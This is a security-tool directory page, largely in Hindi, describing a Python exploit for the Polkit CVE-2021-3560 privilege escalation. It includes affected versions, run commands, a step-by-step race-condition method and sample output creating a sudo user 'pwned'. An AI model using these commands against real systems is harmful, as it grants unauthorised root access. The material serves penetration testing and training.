Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-3560_Polkit — CVE-2021-3560 Polkit स्थानीय विशेषाधिकार वृद्धि भेद्यता के लिए एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/seimupve/cve-2021-3560_polkit
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाबाइनरी शोषणलैब और अभ्यास
GitHubseimupve/cve-2021-3560_polkit

CVE-2021-3560_Polkit

CVE-2021-3560 Polkit स्थानीय विशेषाधिकार वृद्धि भेद्यता के लिए एक्सप्लॉइट

रिपॉजिटरी देखें
711 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-3560 Polkit स्थानीय विशेषाधिकार वृद्धि

        .--.  .-"     "-.  .--.
      / .. \/  .-. .-.  \/ .. \
     | |  '|  /   Y   \  |'  | |
     | \   \  \ 0 | 0 /  /   / |
      \ '- ,\.-"`` ``"-./, -' /
       `'-' /_   ^ ^   _\ '-'`
        .--'|  \._   _./  |'--.
      /`    \   \ `~` /   /    `\
     /       '._ '---' _.'       \
    /           '~---~'           \
   /                               \

लिनक्स सिस्टम पर PolicyKit (Polkit) को प्रभावित करने वाली CVE-2021-3560 भेद्यता के लिए एक स्वचालित शोषण।

⚠️ चेतावनी: यह उपकरण केवल नियंत्रित प्रयोगशाला वातावरण में शैक्षिक और साइबर सुरक्षा प्रशिक्षण उद्देश्यों के लिए है। इस शोषण का उन सिस्टम पर अनधिकृत उपयोग जिनके आप मालिक नहीं हैं, अवैध है।

📋 विषय सूची

  • भेद्यता के बारे में
  • भेद्य सिस्टम
  • विशेषताएं
  • पूर्वापेक्षाएं
  • स्थापना
  • उपयोग
  • यह कैसे काम करता है
  • प्रदर्शन
  • शमन
  • संदर्भ

🔍 भेद्यता के बारे में

CVE-2021-3560 PolicyKit (polkit) में एक स्थानीय रेस कंडीशन भेद्यता है जो एक अनप्रिविलेज्ड उपयोगकर्ता को भेद्य लिनक्स सिस्टम पर रूट विशेषाधिकार प्राप्त करने की अनुमति देती है।

तकनीकी विवरण

  • CVE ID: CVE-2021-3560
  • गंभीरता: उच्च (CVSS 7.8)
  • प्रकार: रेस कंडीशन / टाइम-ऑफ-चेक टाइम-ऑफ-यूज़ (TOCTOU)
  • प्रभाव: स्थानीय विशेषाधिकार वृद्धि (LPE)
  • प्रकटीकरण तिथि: जून 2021

प्रभावित संस्करण

यह भेद्यता Polkit की दो शाखाओं को अलग-अलग संस्करण संख्या के साथ प्रभावित करती है:

अपस्ट्रीम (आधिकारिक संस्करण)

  • भेद्य: 0.113 से 0.118
  • बग परिचय: कमिट bfa5036 (संस्करण 0.113)
  • फिक्स्ड: संस्करण 0.119+

Debian/Ubuntu फोर्क

  • भेद्य: 0.105-26 और उच्चतर (0.118 तक)
  • बग परिचय: कमिट f81d021 (संस्करण 0.105-26)
  • भेद्य नहीं: Debian 10 "buster" (0.105-25)

💻 भेद्य सिस्टम

वितरणPolkit संस्करणभेद्य?
Ubuntu 20.040.105-26ubuntu1✅ हाँ
Ubuntu 18.040.105-20❌ नहीं
Debian testing "bullseye"0.105-31+✅ हाँ
Debian 10 "buster"0.105-25❌ नहीं
RHEL 80.115-11+✅ हाँ
RHEL 7< 0.113❌ नहीं
Fedora 21+0.113+✅ हाँ
Fedora 20 और पहले< 0.113❌ नहीं

📝 नोट: जिन सिस्टम पर सुरक्षा पैच लागू हैं (जैसे ubuntu1.1, deb10u1) वे भेद्य नहीं हैं।

✨ विशेषताएं

  • ✅ स्वचालित पहचान कई वितरणों में भेद्यता की
  • ✅ मल्टी-OS समर्थन: डेबियन, उबंटू, RHEL, CentOS, फेडोरा, आर्क लिनक्स
  • ✅ निर्भरता सत्यापन आवश्यक उपकरणों के लिए
  • ✅ जांच मोड: शोषण के बिना भेद्यता की पुष्टि
  • ✅ अनुकूली समय: इष्टतम रेस कंडीशन समय का स्वचालित माप
  • ✅ प्रगति संकेतक: वास्तविक समय प्रगति प्रदर्शन
  • ✅ रंगीन आउटपुट: स्पष्ट और पढ़ने में आसान इंटरफ़ेस
  • ✅ मजबूत त्रुटि प्रबंधन: विफलता पर स्पष्ट संदेश

📦 पूर्वापेक्षाएँ

पायथन संस्करण

  • पायथन 3.6+ (CentOS 8 जैसे पुराने सिस्टम के साथ संगत)

सिस्टम निर्भरताएँ

शोषण के लिए निम्नलिखित उपकरणों की आवश्यकता है (स्वचालित रूप से सत्यापित):

- dbus-send      # D-Bus के साथ संवाद करने के लिए
- pkexec         # PolicyKit का हिस्सा
- id             # उपयोगकर्ता निर्माण सत्यापित करने के लिए
- openssl        # पासवर्ड हैश उत्पन्न करने के लिए

आवश्यक सेवा

- accountsservice  # स्थापित और सक्रिय होना चाहिए

🚀 स्थापना

# रिपॉजिटरी क्लोन करें (या फ़ाइल डाउनलोड करें)
git clone https://github.com/[your-repo]/CVE-2021-3560_Polkit.git
cd CVE-2021-3560_Polkit

# स्क्रिप्ट को निष्पादन योग्य बनाएँ
chmod +x CVE-2021-3560_Polkit.py

📖 उपयोग

मोड 1: भेद्यता जांच (--check)

जांचें कि सिस्टम शोषण चलाए बिना भेद्य है या नहीं:

python3 CVE-2021-3560_Polkit.py --check

उदाहरण आउटपुट:

[*] ============================================================
[*] CVE-2021-3560 Polkit Vulnerability Checker
[*] ============================================================
[*] Detecting operating system...
[+] OS: Ubuntu 20.04
[*] Checking required dependencies...
[+] Found: dbus-send
[+] Found: pkexec
[+] Found: id
[+] Found: openssl
[*] Detecting Polkit version...
[+] Polkit version: 0.105-26ubuntu1
[+] ============================================================
[+] SYSTEM APPEARS VULNERABLE!
[+] ============================================================
[*] Debian/Ubuntu fork detected (vulnerable since 0.105-26)

मोड 2: शोषण

एक विशेषाधिकार प्राप्त उपयोगकर्ता बनाएँ:

python3 CVE-2021-3560_Polkit.py -u <username> -p <password>

उदाहरण:

python3 CVE-2021-3560_Polkit.py -u hacker -p Password123!

पूर्ण विकल्प

usage: CVE-2021-3560_Polkit.py [-h] [-u USERNAME] [-p PASSWORD] [-c]

options:
  -h, --help            सहायता दिखाएँ
  -u, --username        बनाने के लिए उपयोगकर्ता नाम
  -p, --password        नए उपयोगकर्ता के लिए पासवर्ड
  -c, --check           शोषण के बिना भेद्यता जांचें

⚙️ यह कैसे काम करता है

यह शोषण D-Bus अनुरोध प्रसंस्करण के दौरान PolicyKit में एक रेस कंडीशन का शोषण करता है।

भेद्यता सिद्धांत

  1. D-Bus अनुरोध: उपयोगकर्ता एक उपयोगकर्ता बनाने के लिए D-Bus अनुरोध भेजता है
  2. प्राधिकरण जांच: Polkit जांचता है कि उपयोगकर्ता के पास अनुमतियाँ हैं या नहीं
  3. रेस कंडीशन: यदि सत्यापन के दौरान D-Bus कनेक्शन बंद हो जाता है, तो Polkit UID को 0 (रूट) मानता है
  4. उपयोगकर्ता निर्माण: उपयोगकर्ता उन्नत विशेषाधिकारों के साथ बनाया जाता है

शोषण चरण

┌─────────────────────────────────────────────────────────┐
│ 1. इष्टतम समय मापन                                     │
│    └─> समय को कैलिब्रेट करने के लिए परीक्षण निष्पादन   │
├─────────────────────────────────────────────────────────┤
│ 2. शोषण: उपयोगकर्ता निर्माण                            │
│    └─> D-Bus CreateUser अनुरोध भेजें                    │
│    └─> सटीक क्षण पर प्रक्रिया को मारें (रेस कंडीशन)   │
│    └─> जांचें कि उपयोगकर्ता बना या नहीं                 │
├─────────────────────────────────────────────────────────┤
│ 3. पासवर्ड हैश उत्पादन                                 │
│    └─> openssl passwd -6 का उपयोग करके                  │
├─────────────────────────────────────────────────────────┤
│ 4. शोषण: पासवर्ड सेट करना                              │
│    └─> D-Bus SetPassword अनुरोध भेजें                    │
│    └─> सटीक क्षण पर प्रक्रिया को मारें (रेस कंडीशन)   │
│    └─> पासवर्ड के साथ लॉगिन परीक्षण करें                │
├─────────────────────────────────────────────────────────┤
│ 5. विशेषाधिकार वृद्धि                                   │
│    └─> बनाए गए खाते से लॉगिन करें                       │
│    └─> sudo समूह का सदस्य होने पर sudo का उपयोग करें   │
└─────────────────────────────────────────────────────────┘

🎬 प्रदर्शन

विशिष्ट शोषण परिदृश्य

# 1. Check vulnerability
user@vulnerable:~$ python3 CVE-2021-3560_Polkit.py --check
[+] SYSTEM APPEARS VULNERABLE!

# 2. Launch exploit
user@vulnerable:~$ python3 CVE-2021-3560_Polkit.py -u pwned -p Pwn3d123!

╔═══════════════════════════════════════════════════════════╗
║       CVE-2021-3560 Polkit Privilege Escalation          ║
╚═══════════════════════════════════════════════════════════╝

[*] Creating user 'pwned' using race condition timing attack...
[*] Measuring command execution time...
[*] Command takes ~0.045s, using 0.023s timing
[*] Attempting race condition exploit, please wait...
[+] User 'pwned' created successfully! UID: 1001
[*] User is member of groups: 1001(pwned) 27(sudo)
[*] Generating password hash...
[+] Password hash generated
[*] Setting password for user 'pwned'...
[+] Password set successfully!

╔═══════════════════════════════════════════════════════════╗
║                  EXPLOIT SUCCESSFUL!                      ║
╚═══════════════════════════════════════════════════════════╝
टूल डाउनलोड करें